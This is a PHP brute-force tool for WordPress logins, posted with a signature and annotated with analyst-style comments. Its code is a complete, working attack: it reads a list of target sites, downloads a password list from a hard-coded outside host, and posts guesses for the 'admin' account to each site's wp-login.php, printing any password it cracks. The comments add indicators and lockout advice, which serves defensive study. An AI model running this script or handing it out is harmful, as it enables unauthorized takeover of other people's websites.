
WordPress wp-admin Brute Force

<?php 
/**
 * Password-guessing client for the WordPress login form (wp-login.php).
 *
 * Analyst notes, all taken from the code below:
 *  - Every request is a POST to <site>/wp-login.php with the fixed username
 *    "log=admin", plus "redirect_to=<site>/wp-admin/" and "testcookie=1".
 *  - The password list is downloaded from a hard-coded remote URL over plain HTTP.
 *  - A cookie file named "megaturks.dat" is configured as the cURL cookie jar.
 *  - No CURLOPT_USERAGENT is set, so the User-Agent is whatever the cURL
 *    build sends by default -- confirm against captured traffic.
 *
 * Defensive relevance: a burst of wp-login.php POSTs for the account "admin"
 * from one source is the server-side signature; login throttling or lockout,
 * a second factor, and not keeping a default "admin" account blunt this
 * kind of guessing.
 */
class wp
{
// Declared but not referenced anywhere in this class (methods use local variables instead).
public $site; 
// Declared but not referenced anywhere in this class.
public $password; 
// Candidate passwords, filled by wordlist().
public $wordlist; 
// Target site list, filled by siteler() ("siteler" is Turkish for "sites").
public $siteler; 
// Success marker: pattern searched for in the login response body by burtay().
// NOTE(review): presumably meant to hit the "options-general.php" link that only
// appears in the wp-admin menu after a successful login -- confirm.
public $regex = 'general.php'; 
/**
 * Downloads the password list and splits it into lines.
 *
 * The list comes from a hard-coded URL over plain HTTP; an outbound request
 * to that URL from a host is a network indicator for this script.
 *
 * @return array the lines of the downloaded list (also stored in $this->wordlist)
 */
public function wordlist() { 
$liste = file_get_contents("http://afrikanhosting.com/images/wp.txt"); 
$this->wordlist = explode("\n",$liste); 
return $this->wordlist; 
} 
/**
 * Sends one login attempt and returns the response body.
 *
 * @param string $site     base URL of the site; "/wp-login.php" is appended
 * @param string $password candidate password placed in the "pwd" field
 * @return mixed whatever curl_exec() returns (CURLOPT_RETURNTRANSFER is on)
 */
public function curl($site,$password)
{
$curl = curl_init(); 
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); 
curl_setopt($curl,CURLOPT_URL,$site."/wp-login.php"); 
// Relative path: the cookie file lands in the process's working directory,
// so a "megaturks.dat" file is a host artifact worth searching for.
curl_setopt($curl,CURLOPT_COOKIEJAR,"megaturks.dat"); 
// Redirects are followed, so the returned body is the page reached after the login POST.
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1); 
curl_setopt($curl,CURLOPT_POST,1); 
// Username is fixed to "admin"; only the password varies between requests.
curl_setopt($curl,CURLOPT_POSTFIELDS,"log=admin&pwd=".$password."&redirect_to=".$site."/wp-admin/&testcookie=1"); 
$calis = curl_exec($curl); 
return $calis; 
} 
/**
 * Reads the target list and splits it into lines.
 *
 * @param string $liste location handed straight to file_get_contents()
 * @return array the lines of the list (also stored in $this->siteler)
 */
public function siteler($liste)
{ 
$site = file_get_contents($liste); 
$this->siteler = explode("\n",$site); return $this->siteler; 
} 
/**
 * Main loop: for each site in the list, tries each password until the
 * success marker shows up in the response, then moves on to the next site.
 *
 * Progress and results go to stdout in Turkish; a hit prints the site and
 * the matching password in clear text.
 *
 * @param string $liste location of the target list, passed to siteler()
 */
public function burtay($liste)
{ 
$this->siteler($liste); 
foreach($this->siteler as $sites)
{ 
$site = trim($sites); 
// "Denenen Site" = "Site being tried".
echo "Denenen Site : " . $site . "\n"; 
// wordlist() is called here, so the remote list is fetched again for every site.
foreach($this->wordlist() as $sifre) 
{ 
$password = trim($sifre); 
// "Denenen Sifre" = "Password being tried".
echo "Denenen Sifre " . $password . "\n"; 
// eregi() is a case-insensitive POSIX regex match; it was removed in PHP 7.0,
// which dates this script to the PHP 5 era.
if ( eregi ($this->regex,$this->curl($site,$password)) )
{
echo "-------------------------------------\n"; 
// "icin sifre kirildi sifre" = "password cracked for <site>, password:".
echo $site . " icin sifre kirildi sifre : " . $password . "\n" ; 
echo "xxx\n"; 
echo "xxx\n"; 
echo "-------------------------------------\n"; 
// Stop guessing for this site after the first match.
break; 
}
}
}
}
}
// Banner written to stdout before the run starts.
echo " ------------------ xxxxx || xxx || ------------------ \n\n "; 
// CLI entry point: the first command-line argument is handed to burtay() as the
// location of the target list.
$class = new wp(); $class->burtay($argv[1]); 
?>


Regards,
Hardeep Singh
(www.fb.com/h4rdeep)
